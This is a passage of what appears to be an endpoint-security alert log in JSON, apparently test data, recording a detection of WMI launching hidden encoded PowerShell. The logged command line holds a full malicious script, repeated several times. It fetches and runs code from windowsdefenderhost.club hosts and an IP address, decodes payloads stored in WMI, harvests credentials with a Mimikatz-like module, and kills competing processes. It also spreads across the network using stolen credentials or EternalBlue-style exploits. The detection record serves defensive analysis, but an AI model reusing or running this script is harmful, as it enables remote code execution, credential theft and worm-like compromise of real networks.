 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
